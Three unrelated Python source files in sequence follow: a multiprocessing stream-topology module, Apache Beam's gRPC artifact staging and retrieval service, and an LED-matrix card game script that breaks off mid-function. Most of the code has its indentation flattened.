self.raw_sinks = sinks
self.sources = []
self.operators = []
self.sinks = []
self.queues = dict()
self._prepare_topology()
def _prepare_topology(self):
sources = []
for source in self.raw_sources:
queues = []
for out in list(source.outputs.keys()):
queue = multiprocessing.Queue()
queues.append(queue)
self.queues[(source.name, out)] = queue
sources.append(SourceWrapper(source, queues))
for operator in self.raw_operators:
queues = []
for out in list(operator.outputs.keys()):
queue = multiprocessing.Queue()
queues.append(queue)
self.queues[(operator.name, out)] = queue
operators = []
for operator in self.raw_operators:
in_queues = []
for node in list(operator.inputs.keys()):
queue = self.queues.get((node, operator.name))
if queue is None:
raise AttributeError(f'Found uninitialized edge: {node}->{operator.name}')
in_queues.append((node, queue))
out_queues = []
for node1, node2 in self.queues:
if node1 == operator.name:
out_queues.append(self.queues[(node1, node2)])
operators.append(OperatorWrapper(operator, in_qs=in_queues, out_qs=out_queues))
sinks = []
for sink in self.raw_sinks:
queues = []
for node in list(sink.inputs.keys()):
queue = self.queues.get((node, sink.name))
if queue is None:
raise AttributeError(f'Found uninitialized edge: {node}->{sink.name}')
queues.append((node, queue))
sinks.append(SinkWrapper(sink, queues))
self.sources = sources
self.operators = operators
self.sinks = sinks
@property
def nodes(self):
all_nodes = self.operators.copy()
all_nodes.extend(self.sources)
all_nodes.extend(self.sinks)
return all_nodes
def stop_topology(self):
for q in self.queues.values():
q.put(ParallelTopology.__POISON__)
def _contains_duplicate_node(nodes: List[Node], check: Node):
for node in nodes:
if node.name == check.name and node is not check:
return True
return False
def _warn_duplicate(nodes: List[Node], logger: logging.Logger):
already_logged = dict()
for node in nodes:
if _contains_duplicate_node(nodes, node) and already_logged.get(node.name) is None:
already_logged[node.name] = True
            logger.warning(f'Topology contains more than one node named "{node.name}". '
                           f'Nodes must have unique names; rename the duplicates.')
def mk_parallel_topology(start: List[Source], logger: logging.Logger = logging.getLogger(__name__)) -> ParallelTopology:
"""
Helper function to generate a topology from a list of initialized sources.
    Recursively walks the graph from the sources to collect every operator and sink in use.
"""
sources = start
_warn_duplicate(sources, logger)
operators = dict()
sinks = dict()
def register_node(node):
if isinstance(node, Operator):
operators[node.name] = node
for out in node.outputs.values():
register_node(out)
elif isinstance(node, Sink):
sinks[node.name] = node
elif isinstance(node, Source):
for out in node.outputs.values():
register_node(out)
else:
raise AttributeError('Unknown Node Type encountered')
for source in sources:
register_node(source)
return ParallelTopology(sources, list(operators.values()), list(sinks.values()))
def get_items(in_qs):
items = dict()
for node_name, in_q in in_qs:
item = in_q.get()
if item == ParallelTopology.__POISON__:
items = ParallelTopology.__POISON__
return items
items[node_name] = item
if len(items) == 1:
items = list(items.values())[0]
return items
class OperatorWrapper:
def __init__(self, op: Operator, in_qs: List[Tuple[str, multiprocessing.Queue]],
out_qs: List[multiprocessing.Queue]):
if len(in_qs) == 0:
raise AttributeError(f'Operator does not have any inputs {op.name}')
if len(out_qs) == 0:
raise AttributeError(f'Operator does not have any outputs {op.name}')
self.op = op
self.in_qs = in_qs
self.out_qs = out_qs
self.closed = False
def run(self, stop: multiprocessing.Event):
self.logger.debug(f'start operator {self.name}')
self.open()
try:
while not stop.is_set():
items = get_items(self.in_qs)
if items == ParallelTopology.__POISON__:
return
self.apply(items, self.publish)
except (KeyboardInterrupt, EOFError):
return
finally:
self.close()
def publish(self, out):
# TODO maybe make None filtering optional via parameter
if out is not None:
for out_q in self.out_qs:
out_q.put(out)
@property
def logger(self):
return self.op.logger
@property
def name(self):
return self.op.name
def open(self):
self.op.open()
def apply(self, data, out):
return self.op.apply(data, out)
def close(self):
if not self.closed:
self.logger.warning(f'Shutting down {self.op.name}')
self.op.close()
self.closed = True
def __str__(self):
return str(self.op)
class SinkWrapper:
def __init__(self, sink: Sink, in_qs: List[Tuple[str, multiprocessing.Queue]]):
if len(in_qs) == 0:
raise AttributeError(f'Sink does not have any inputs {sink.name}')
self.sink = sink
self.in_qs = in_qs
self.closed = False
def run(self, stop: multiprocessing.Event):
self.logger.debug(f'start sink {self.name}')
self.open()
try:
while not stop.is_set():
items = get_items(self.in_qs)
if items == ParallelTopology.__POISON__:
return
self.write(items)
except (KeyboardInterrupt, EOFError):
pass
finally:
self.close()
return
def open(self):
self.sink.open()
def write(self, data):
self.sink.write(data)
def close(self):
if not self.closed:
self.closed = True
self.logger.warning(f'Shutting down {self.sink.name}')
self.sink.close()
@property
def name(self) -> str:
return self.sink.name
@property
def logger(self) -> logging.Logger:
return self.sink.logger
def __str__(self):
return str(self.sink)
class SourceWrapper:
def __init__(self, source: Source, out_qs: List[multiprocessing.Queue]):
if len(out_qs) == 0:
raise AttributeError(f'Source does not contain any outgoing queues {source.name}')
self.source = source
self.out_qs = out_qs
self.closed = False
def run(self, stop: multiprocessing.Event):
self.logger.debug(f'start source {self.name}')
try:
while not stop.is_set():
self.read(self.publish)
except (KeyboardInterrupt, EOFError):
pass
finally:
self.close()
def read(self, out):
self.source.read(out)
def close(self):
if not self.closed:
self.closed = True
self.logger.warning(f'Shutting down {self.name}')
self.source.close()
def publish(self, item):
# TODO maybe make None filtering optional via parameter
if item is not None:
for out_q in self.out_qs:
out_q.put(item)
@property
def name(self):
return self.source.name
@property
def logger(self):
return self.source.logger
def __str__(self):
return str(self.source)
class ParallelEnvironment(Environment, Generic[Result, Out]):
"""This environment will execute each node in its own thread. Nodes communicate via multiprocessing.Queue instances
to publish and receive data. This allows to let each node work at its own pace
"""
def __init__(self, topology: ParallelTopology,
task_factory: Callable[[Node, multiprocessing.Event], Executable], logger: logging.Logger = None):
"""
Initializes the environment
:param topology: the topology that will be executed
:param task_factory: factory function that produces from a node and a stop event an executable,
i.e.: multiprocessing.Process or threading.Thread
        :param logger: logger used by the environment; defaults to the module logger
"""
super().__init__(topology, multiprocessing.Event())
if logger is None:
logger = logging.getLogger(__name__)
self.task_factory = task_factory
self.logger = logger
self.p = None
self.nodes = topology.nodes
def start(self, use_thread: bool = False):
if use_thread:
self.p = threading.Thread(target=self.run)
else:
self.p = multiprocessing.Process(target=self.run)
self.p.start()
def join(self, timeout: int = None):
self.p.join(timeout)
def run(self):
processes = []
for node in self.topology.nodes:
processes.append(self.task_factory(node, self.stop_signal))
for p in processes:
p.start()
        self.logger.warning('Started topology, waiting for stop signal')
self.stop_signal.wait()
self.topology.stop_topology()
self.logger.warning('Received stop signal, stopping all processes')
def stop(self):
self.logger.info('Stop environment')
self.stop_signal.set()
def close(self):
for node in self.nodes:
node.close()
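# --- Hedged usage sketch (illustrative only, not part of the module) ----------
# The task_factory passed to ParallelEnvironment only has to wrap a node's
# run(stop) method in an executable such as threading.Thread or
# multiprocessing.Process. The factory below is a minimal example; the topology
# itself is assumed to be built elsewhere with the module's ParallelTopology API.
def _example_thread_task_factory(node, stop: multiprocessing.Event) -> threading.Thread:
    """Run each wrapped node in a daemon thread driven by the shared stop event."""
    task = threading.Thread(target=node.run, args=(stop,), name=str(node))
    task.daemon = True
    return task
# Example wiring (assuming `topology` is a fully built ParallelTopology):
#   env = ParallelEnvironment(topology, _example_thread_task_factory)
#   env.start(use_thread=True)
#   ...
#   env.stop(); env.join(); env.close()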
|
artifact_service.py
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Implementation of an Artifact{Staging,Retrieval}Service.
The staging service here can be backed by any beam filesystem.
"""
# pytype: skip-file
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import concurrent.futures
import contextlib
import hashlib
import os
import queue
import sys
import tempfile
import threading
from io import BytesIO
from typing import Any
from typing import BinaryIO # pylint: disable=unused-import
from typing import Callable
from typing import Dict
from typing import List
from typing import MutableMapping
from typing import Optional
from typing import Tuple
import grpc
from future.moves.urllib.request import urlopen
from apache_beam.io import filesystems
from apache_beam.io.filesystems import CompressionTypes
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.utils import proto_utils
class ArtifactRetrievalService(
beam_artifact_api_pb2_grpc.ArtifactRetrievalServiceServicer):
_DEFAULT_CHUNK_SIZE = 2 << 20
def __init__(
self,
file_reader, # type: Callable[[str], BinaryIO]
chunk_size=None,
):
self._file_reader = file_reader
self._chunk_size = chunk_size or self._DEFAULT_CHUNK_SIZE
def ResolveArtifacts(self, request, context=None):
return beam_artifact_api_pb2.ResolveArtifactsResponse(
replacements=request.artifacts)
def GetArtifact(self, request, context=None):
if request.artifact.type_urn == common_urns.artifact_types.FILE.urn:
payload = proto_utils.parse_Bytes(
request.artifact.type_payload,
beam_runner_api_pb2.ArtifactFilePayload)
read_handle = self._file_reader(payload.path)
elif request.artifact.type_urn == common_urns.artifact_types.URL.urn:
payload = proto_utils.parse_Bytes(
request.artifact.type_payload, beam_runner_api_pb2.ArtifactUrlPayload)
# TODO(Py3): Remove the unneeded contextlib wrapper.
read_handle = contextlib.closing(urlopen(payload.url))
elif request.artifact.type_urn == common_urns.artifact_types.EMBEDDED.urn:
payload = proto_utils.parse_Bytes(
request.artifact.type_payload,
beam_runner_api_pb2.EmbeddedFilePayload)
read_handle = BytesIO(payload.data)
else:
raise NotImplementedError(request.artifact.type_urn)
with read_handle as fin:
while True:
chunk = fin.read(self._chunk_size)
if not chunk:
break
yield beam_artifact_api_pb2.GetArtifactResponse(data=chunk)
class ArtifactStagingService(
beam_artifact_api_pb2_grpc.ArtifactStagingServiceServicer):
def __init__(
self,
file_writer, # type: Callable[[str, Optional[str]], Tuple[BinaryIO, str]]
):
self._lock = threading.Lock()
self._jobs_to_stage = {
} # type: Dict[str, Tuple[Dict[Any, List[beam_runner_api_pb2.ArtifactInformation]], threading.Event]]
self._file_writer = file_writer
def register_job(
self,
staging_token, # type: str
dependency_sets # type: MutableMapping[Any, List[beam_runner_api_pb2.ArtifactInformation]]
):
if staging_token in self._jobs_to_stage:
raise ValueError('Already staging %s' % staging_token)
with self._lock:
self._jobs_to_stage[staging_token] = (
dict(dependency_sets), threading.Event())
def resolved_deps(self, staging_token, timeout=None):
with self._lock:
dependency_sets, event = self._jobs_to_stage[staging_token]
try:
if not event.wait(timeout):
raise concurrent.futures.TimeoutError()
return dependency_sets
finally:
with self._lock:
del self._jobs_to_stage[staging_token]
def ReverseArtifactRetrievalService(self, responses, context=None):
staging_token = next(responses).staging_token
with self._lock:
try:
dependency_sets, event = self._jobs_to_stage[staging_token]
except KeyError:
if context:
context.set_code(grpc.StatusCode.NOT_FOUND)
context.set_details('No such staging token: %r' % staging_token)
raise
requests = _QueueIter()
class ForwardingRetrievalService(object):
def ResolveArtifactss(self, request):
requests.put(
beam_artifact_api_pb2.ArtifactRequestWrapper(
resolve_artifact=request))
return next(responses).resolve_artifact_response
def GetArtifact(self, request):
requests.put(
beam_artifact_api_pb2.ArtifactRequestWrapper(get_artifact=request))
while True:
response = next(responses)
yield response.get_artifact_response
if response.is_last:
break
def resolve():
try:
for key, dependencies in dependency_sets.items():
dependency_sets[key] = list(
resolve_as_files(
ForwardingRetrievalService(),
lambda name: self._file_writer(
os.path.join(staging_token, name)),
dependencies))
requests.done()
except: # pylint: disable=bare-except
requests.abort()
raise
finally:
event.set()
t = threading.Thread(target=resolve)
t.daemon = True
t.start()
return requests
def resolve_as_files(retrieval_service, file_writer, dependencies):
"""Translates a set of dependencies into file-based dependencies."""
# Resolve until nothing changes. This ensures that they can be fetched.
resolution = retrieval_service.ResolveArtifactss(
beam_artifact_api_pb2.ResolveArtifactsRequest(
artifacts=dependencies,
# Anything fetchable will do.
# TODO(robertwb): Take advantage of shared filesystems, urls.
preferred_urns=[],
))
dependencies = resolution.replacements
# Fetch each of the dependencies, using file_writer to store them as
# file-based artifacts.
# TODO(robertwb): Consider parallelizing the actual writes.
for dep in dependencies:
if dep.role_urn == common_urns.artifact_roles.STAGING_TO.urn:
base_name = os.path.basename(
proto_utils.parse_Bytes(
dep.role_payload,
beam_runner_api_pb2.ArtifactStagingToRolePayload).staged_name)
else:
base_name = None
unique_name = '-'.join(
filter(
None,
[hashlib.sha256(dep.SerializeToString()).hexdigest(), base_name]))
file_handle, path = file_writer(unique_name)
with file_handle as fout:
for chunk in retrieval_service.GetArtifact(
beam_artifact_api_pb2.GetArtifactRequest(artifact=dep)):
fout.write(chunk.data)
yield beam_runner_api_pb2.ArtifactInformation(
type_urn=common_urns.artifact_types.FILE.urn,
type_payload=beam_runner_api_pb2.ArtifactFilePayload(
path=path).SerializeToString(),
role_urn=dep.role_urn,
role_payload=dep.role_payload)
def offer_artifacts(
artifact_staging_service, artifact_retrieval_service, staging_token):
"""Offers a set of artifacts to an artifact staging service, via the
ReverseArtifactRetrievalService API.
The given artifact_retrieval_service should be able to resolve/get all
artifacts relevant to this job.
"""
responses = _QueueIter()
responses.put(
beam_artifact_api_pb2.ArtifactResponseWrapper(
staging_token=staging_token))
requests = artifact_staging_service.ReverseArtifactRetrievalService(responses)
try:
for request in requests:
if request.HasField('resolve_artifact'):
responses.put(
beam_artifact_api_pb2.ArtifactResponseWrapper(
resolve_artifact_response=artifact_retrieval_service.
ResolveArtifacts(request.resolve_artifact)))
elif request.HasField('get_artifact'):
for chunk in artifact_retrieval_service.GetArtifact(
request.get_artifact):
responses.put(
beam_artifact_api_pb2.ArtifactResponseWrapper(
get_artifact_response=chunk))
responses.put(
beam_artifact_api_pb2.ArtifactResponseWrapper(
get_artifact_response=beam_artifact_api_pb2.GetArtifactResponse(
data=b''),
is_last=True))
responses.done()
except: # pylint: disable=bare-except
responses.abort()
raise
class BeamFilesystemHandler(object):
def __init__(self, root):
self._root = root
def file_reader(self, path):
return filesystems.FileSystems.open(
path, compression_type=CompressionTypes.UNCOMPRESSED)
def file_writer(self, name=None):
full_path = filesystems.FileSystems.join(self._root, name)
return filesystems.FileSystems.create(full_path), full_path
def resolve_artifacts(artifacts, service, dest_dir):
if not artifacts:
return artifacts
else:
return [
maybe_store_artifact(artifact, service,
dest_dir) for artifact in service.ResolveArtifacts(
beam_artifact_api_pb2.ResolveArtifactsRequest(
artifacts=artifacts)).replacements
]
def maybe_store_artifact(artifact, service, dest_dir):
if artifact.type_urn in (common_urns.artifact_types.URL.urn,
common_urns.artifact_types.EMBEDDED.urn):
return artifact
elif artifact.type_urn == common_urns.artifact_types.FILE.urn:
payload = beam_runner_api_pb2.ArtifactFilePayload.FromString(
artifact.type_payload)
if os.path.exists(
payload.path) and payload.sha256 and payload.sha256 == sha256(
payload.path) and False:
return artifact
else:
return store_artifact(artifact, service, dest_dir)
else:
return store_artifact(artifact, service, dest_dir)
def store_artifact(artifact, service, dest_dir):
hasher = hashlib.sha256()
with tempfile.NamedTemporaryFile(dir=dest_dir, delete=False) as fout:
for block in service.GetArtifact(
beam_artifact_api_pb2.GetArtifactRequest(artifact=artifact)):
hasher.update(block.data)
fout.write(block.data)
return beam_runner_api_pb2.ArtifactInformation(
type_urn=common_urns.artifact_types.FILE.urn,
type_payload=beam_runner_api_pb2.ArtifactFilePayload(
path=fout.name, sha256=hasher.hexdigest()).SerializeToString(),
role_urn=artifact.role_urn,
role_payload=artifact.role_payload)
def sha256(path):
hasher = hashlib.sha256()
with open(path, 'rb') as fin:
for block in iter(lambda: fin.read(4 << 20), b''):
hasher.update(block)
return hasher.hexdigest()
class _QueueIter(object):
_END = object()
def __init__(self):
self._queue = queue.Queue()
def put(self, item):
self._queue.put(item)
def done(self):
self._queue.put(self._END)
self._queue.put(StopIteration)
def abort(self, exn=None):
if exn is None:
exn = sys.exc_info()[1]
self._queue.put(self._END)
self._queue.put(exn)
def __iter__(self):
return self
def __next__(self):
item = self._queue.get()
if item is self._END:
raise self._queue.get()
else:
return item
if sys.version_info < (3, ):
next = __next__
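# --- Hedged usage sketch (illustrative only, not part of the Beam module) -----
# Shows how the retrieval servicer above can be wired to a filesystem-backed
# handler and exposed over gRPC. The add_*Servicer_to_server helper name follows
# the standard generated-stub convention; port 0 picks a free port.
def _example_serve_retrieval(root, port=0):
  handler = BeamFilesystemHandler(root)
  server = grpc.server(concurrent.futures.ThreadPoolExecutor(max_workers=2))
  beam_artifact_api_pb2_grpc.add_ArtifactRetrievalServiceServicer_to_server(
      ArtifactRetrievalService(handler.file_reader), server)
  bound_port = server.add_insecure_port('[::]:%d' % port)
  server.start()
  return server, bound_port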
|
gameWithCom.py
|
# -*- coding:utf-8 -*-
import LED_display as LED
import threading
import keyboard
import time
import numpy as np
import random
import copy
import os
import sys
import serial
ser = serial.Serial('/dev/ttyACM0', 9600)
ser_who = -1
num_1=[[0,1,0,0],
[1,1,0,0],
[0,1,0,0],
[0,1,0,0],
[1,1,1,0],
[0,0,0,0]]
num_2=[[0,1,0,0],
[1,0,1,0],
[0,0,1,0],
[0,1,0,0],
[1,1,1,0],
[0,0,0,0]]
num_3=[[1,1,1,0],
[0,0,1,0],
[0,1,0,0],
[0,0,1,0],
[1,1,0,0],
[0,0,0,0]]
num_4=[[1,0,1,0],
[1,0,1,0],
[1,1,1,0],
[0,0,1,0],
[0,0,1,0],
[0,0,0,0]]
num_5=[[1,1,1,0],
[1,0,0,0],
[1,1,0,0],
[0,0,1,0],
[1,1,0,0],
[0,0,0,0]]
num_6=[[0,1,1,0],
[1,0,0,0],
[1,1,0,0],
[1,0,1,0],
[0,1,0,0],
[0,0,0,0]]
num_7=[[1,1,1,0],
[0,0,1,0],
[0,1,0,0],
[1,0,0,0],
[1,0,0,0],
[0,0,0,0]]
num_8=[[0,1,1,0],
[1,0,1,0],
[0,1,0,0],
[1,0,1,0],
[1,1,0,0],
[0,0,0,0]]
num_9=[[0,1,0,0],
[1,0,1,0],
[0,1,1,0],
[0,0,1,0],
[1,1,0,0],
[0,0,0,0]]
num_0=[[0,1,0,0],
[1,0,1,0],
[1,1,1,0],
[1,0,1,0],
[0,1,0,0],
[0,0,0,0]]
SP= [[0,0,0,0],
[0,0,0,0],
[0,0,0,0],
[0,0,0,0],
[0,0,0,0],
[0,0,0,0]]
A= [[0,1,0,0],
[1,0,1,0],
[1,1,1,0],
[1,0,1,0],
[1,0,1,0],
[0,0,0,0]]
B= [[1,1,0,0],
[1,0,1,0],
[1,1,0,0],
[1,0,1,0],
[1,1,0,0],
[0,0,0,0]]
C= [[0,1,0,0],
[1,0,1,0],
[1,0,0,0],
[1,0,1,0],
[0,1,0,0],
[0,0,0,0]]
D= [[1,1,0,0],
[1,0,1,0],
[1,0,1,0],
[1,0,1,0],
[1,1,0,0],
[0,0,0,0]]
E= [[1,1,1,0],
[1,0,0,0],
[1,1,0,0],
[1,0,0,0],
[1,1,1,0],
[0,0,0,0]]
F= [[1,1,1,0],
[1,0,0,0],
[1,1,0,0],
[1,0,0,0],
[1,0,0,0],
[0,0,0,0]]
G= [[0,1,1,0],
[1,0,0,0],
[1,0,1,0],
[1,0,1,0],
[0,1,1,0],
[0,0,0,0]]
H= [[1,0,1,0],
[1,0,1,0],
[1,1,1,0],
[1,0,1,0],
[1,0,1,0],
[0,0,0,0]]
I= [[1,1,1,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0],
[1,1,1,0],
[0,0,0,0]]
J= [[0,0,1,0],
[0,0,1,0],
[0,0,1,0],
[1,0,1,0],
[0,1,0,0],
[0,0,0,0]]
K= [[1,0,1,0],
[1,0,1,0],
[1,1,0,0],
[1,0,1,0],
[1,0,1,0],
[0,0,0,0]]
L= [[1,0,0,0],
[1,0,0,0],
[1,0,0,0],
[1,0,0,0],
[1,1,1,0],
[0,0,0,0]]
M= [[1,0,1,0],
[1,1,1,0],
[1,1,1,0],
[1,0,1,0],
[1,0,1,0],
[0,0,0,0]]
N= [[0,0,1,0],
[1,0,1,0],
[1,1,1,0],
[1,0,1,0],
[1,0,0,0],
[0,0,0,0]]
O= [[0,1,0,0],
[1,0,1,0],
[1,0,1,0],
[1,0,1,0],
[0,1,0,0],
[0,0,0,0]]
P= [[1,1,0,0],
[1,0,1,0],
[1,1,0,0],
[1,0,0,0],
[1,0,0,0],
[0,0,0,0]]
Q= [[0,1,0,0],
[1,0,1,0],
[1,0,1,0],
[1,0,1,0],
[0,1,0,0],
[0,0,1,0]]
R= [[1,1,0,0],
[1,0,1,0],
[1,1,0,0],
[1,0,1,0],
[1,0,1,0],
[0,0,0,0]]
S= [[0,1,1,0],
[1,0,0,0],
[0,1,0,0],
[0,0,1,0],
[1,1,0,0],
[0,0,0,0]]
T= [[1,1,1,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0],
[0,0,0,0]]
U= [[1,0,1,0],
[1,0,1,0],
[1,0,1,0],
[1,0,1,0],
[1,1,1,0],
[0,0,0,0]]
V= [[1,0,1,0],
[1,0,1,0],
[1,0,1,0],
[1,1,1,0],
[0,1,0,0],
[0,0,0,0]]
W= [[1,0,1,0],
[1,0,1,0],
[1,1,1,0],
[1,1,1,0],
[1,0,1,0],
[0,0,0,0]]
X= [[1,0,1,0],
[1,0,1,0],
[0,1,0,0],
[1,0,1,0],
[1,0,1,0],
[0,0,0,0]]
Y= [[1,0,1,0],
[1,0,1,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0],
[0,0,0,0]]
Z= [[1,1,1,0],
[0,0,1,0],
[0,1,0,0],
[1,0,0,0],
[1,1,1,0],
[0,0,0,0]]
ex= [[0,1,0,0],
[0,1,0,0],
[0,1,0,0],
[0,0,0,0],
[0,1,0,0],
[0,0,0,0]]
qst= [[1,1,0,0],
[0,0,1,0],
[0,1,0,0],
[0,0,0,0],
[0,1,0,0],
[0,0,0,0]]
dot= [[0,0,0,0],
[0,0,0,0],
[0,0,0,0],
[0,0,0,0],
[0,1,0,0],
[0,0,0,0]]
hadot= [[0,0,0,0],
[0,0,0,0],
[0,0,0,0],
[0,0,0,0],
[0,1,0,0],
[1,0,0,0]]
colon= [[0,0,0,0],
[0,1,0,0],
[0,0,0,0],
[0,0,0,0],
[0,1,0,0],
[0,0,0,0]]
def clean1():
for i in range(8):
for j in range(32):
LED.screen[i][j]=0
def clean2():
for i in range(6,16,1):
for j in range(32):
LED.screen[i][j]=0
def write0(a,b):
q=0
for letter in a:
for i in range(6):
for j in range(4):
if letter[i][j]!=0:
LED.screen[i+6][j+q+2]=letter[i][j]+ b-1
q+=4
def write1(a,b): # a: list of glyph bitmaps to display, b: color index
q=0
for letter in a:
for i in range(6):
for j in range(4):
if letter[i][j]!=0:
LED.screen[i][j+q]=letter[i][j]+ b-1
q+=4
def write2(a,b):
q=0
for letter in a:
for i in range(6):
for j in range(4):
if letter[i][j]!=0:
LED.screen[i+6][j+q]=letter[i][j]+b-1
q+=4
def printgoodgameset(a):
for i in range(16):
for j in range(32):
LED.screen[i][j]=0
write1([SP,P,a,SP,W,I,N,ex],5)
for i in [num_3,num_2,num_1]:
write0([SP,SP,SP,i],3)
time.sleep(1)
clean2()
for i in range(16):
for j in range(32):
LED.screen[i][j]=0
def printbadgameset(a):
for i in range(16):
for j in range(32):
LED.screen[i][j]=0
write1([SP,P,a,SP,F,A,I,L],5)
for i in [num_3,num_2,num_1]:
write0([SP,SP,SP,i],3)
time.sleep(1)
clean2()
for i in range(16):
for j in range(32):
LED.screen[i][j]=0
iScreen = [[0 for x in range(32)] for x in range(16)]
class Card:
coord = None
color = None
count = None
def __init__(self, coord = np.zeros((8,16)), color = 0, count = 0):
self.coord = [ [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]]
self.color = color +1
for i in range(8):
for j in range(16):
if coord[i][j] != 0:
self.coord[i][j] = coord[i][j] + color
self.count = count
class Player:
player_id = None
time = 9.9
hand_cards = None
order = None
card = None
live = None
def __init__ (self, player_id = "", time = 0, hand_cards = [], order=0):
self.player_id = player_id
self.time = time
self.hand_cards = hand_cards
self.order = order
self.card = None
self.live = True
def output(self):
global present_surface_card, present_sum,present_total_card, time1
if len(self.hand_cards) == 0:
lose()
else:
if self.card is not None:
present_surface_card[0] = []
present_sum[self.card.color-1] = present_sum[self.card.color-1] - self.card.count
self.card = self.hand_cards.pop()
present_surface_card[0] = [self.card]
present_total_card = present_total_card+[self.card]
present_sum[self.card.color-1] = present_sum[self.card.color-1] + self.card.count
print("[R G Y B]")
print(present_sum)
if(self.order == 1):
for i in range(8):
for j in range(16):
LED.screen[i][j]=self.card.coord[i][j]
elif(self.order == 2):
for i in range(8):
for j in range(16):
LED.screen[i][j+16]=self.card.coord[i][j]
elif(self.order == 3):
for i in range(8):
for j in range(16):
LED.screen[i+8][j]=self.card.coord[i][j]
elif(self.order == 4):
for i in range(8):
for j in range(16):
LED.screen[i+8][j+16]=self.card.coord[i][j]
time1 = time.time()
oneCard = [[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1],
[1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
twoCard = [[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1],
[1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
threeCard = [[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1],
[1,0,0,0,0,0,0,1,1,0,0,0,1,1,0,1],
[1,0,1,1,0,0,0,1,1,0,0,0,0,0,0,1],
[1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
fourCard = [[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,1,1,0,0,0,0,1,1,0,0,0,0,0,1],
[1,0,1,1,0,0,0,0,1,1,0,0,0,0,0,1],
[1,0,0,0,0,1,1,0,0,0,0,1,1,0,0,1],
[1,0,0,0,0,1,1,0,0,0,0,1,1,0,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
fiveCard = [[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,1,1,0,0,0,1,1,0,0,0,1,1,0,1],
[1,0,1,1,0,0,0,1,1,0,0,0,1,1,0,1],
[1,0,0,0,1,1,0,0,0,0,1,1,0,0,0,1],
[1,0,0,0,1,1,0,0,0,0,1,1,0,0,0,1],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
TAKE = 0
total_card = [] # full deck of cards (list)
present_sum = np.asarray([0,0,0,0]) # running count of symbols shown for each color
present_surface_card = [[],[],[],[]]
present_total_card = [] # all cards currently face up on the field
card1 = None
card2 = None
card3 = None
card4 = None
p1 = []
p2 = []
p3 = []
p4 = []
player_list=[]
who = -1
time1 = None
def LED_init():
thread=threading.Thread(target=LED.main, args=())
thread.setDaemon(True)
thread.start()
return
def initCard():
global total_card
for i in range(4):
total_card.append(Card(oneCard, i, 1))
total_card.append(Card(oneCard, i, 1))
total_card.append(Card(oneCard, i, 1))
total_card.append(Card(oneCard, i, 1))
total_card.append(Card(oneCard, i, 1))
total_card.append(Card(twoCard, i, 2))
total_card.append(Card(twoCard, i, 2))
total_card.append(Card(twoCard, i, 2))
total_card.append(Card(threeCard, i, 3))
total_card.append(Card(threeCard, i, 3))
total_card.append(Card(threeCard, i, 3))
total_card.append(Card(fourCard, i, 4))
total_card.append(Card(fourCard, i, 4))
total_card.append(Card(fiveCard, i, 5))
random.shuffle(total_card)
def initPlayer(mode):
global total_card, p1,p2,p3,p4,player_list
# getPlayerName() -> p1.name, p2.name, p3.name, p4.name
if(mode == 0):
p1 = Player("P1", 9.99,total_card[0:14], 1)
p2 = Player("P2", 9.99,total_card[14:28], 2)
p3 = Player("P3", 9.99,total_card[28:42], 3)
p4 = Player("P4", 9.99,total_card[42:], 4)
player_list = [p1,p2,p3,p4]
else:
p1 = Player("P1", 9.99, total_card[0:28],1)
